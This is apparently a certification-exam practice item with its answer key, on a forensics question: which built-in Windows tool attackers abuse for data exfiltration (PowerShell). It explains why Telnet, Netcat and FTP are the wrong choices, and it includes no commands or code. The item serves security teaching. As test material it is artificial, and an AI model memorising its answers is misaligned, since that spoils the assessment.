During a forensic investigation, you find that the attacker used a legitimate Windows tool to exfiltrate data. Which tool is commonly abused for this purpose?
PowerShell is native to Windows and frequently used for file exfiltration due to its flexibility.
Why this answer
PowerShell is a legitimate Windows administrative tool that attackers commonly abuse for data exfiltration because it provides native access to network protocols (e.g., HTTP, HTTPS, FTP, SMB) and can download/upload files directly from the command line without additional binaries. Its deep integration with the Windows operating system allows scripts to run in memory, bypassing traditional file-based detection mechanisms, making it a favored tool for post-exploitation data theft.
Exam trap
The trap here is that candidates often associate Netcat (a classic hacking tool) with data exfiltration, but the question specifically requires a 'legitimate Windows tool,' and PowerShell is the correct answer because it is built-in and widely abused, whereas Netcat is not native to Windows.
How to eliminate wrong answers
Option A is wrong because Telnet is an unencrypted remote terminal protocol (RFC 854) that lacks native file transfer capabilities; while it can be used to send data manually, it is not commonly abused for automated or stealthy exfiltration due to its lack of encryption and limited scripting support. Option B is wrong because Netcat is a third-party network utility (not a legitimate Windows built-in tool) that can be used for data exfiltration, but the question specifies a 'legitimate Windows tool,' and Netcat is not included by default in Windows. Option D is wrong because FTP is a file transfer protocol that can be used for exfiltration, but the built-in Windows FTP client (ftp.exe) is deprecated and less commonly abused compared to PowerShell, which offers more flexibility and is present on all modern Windows systems.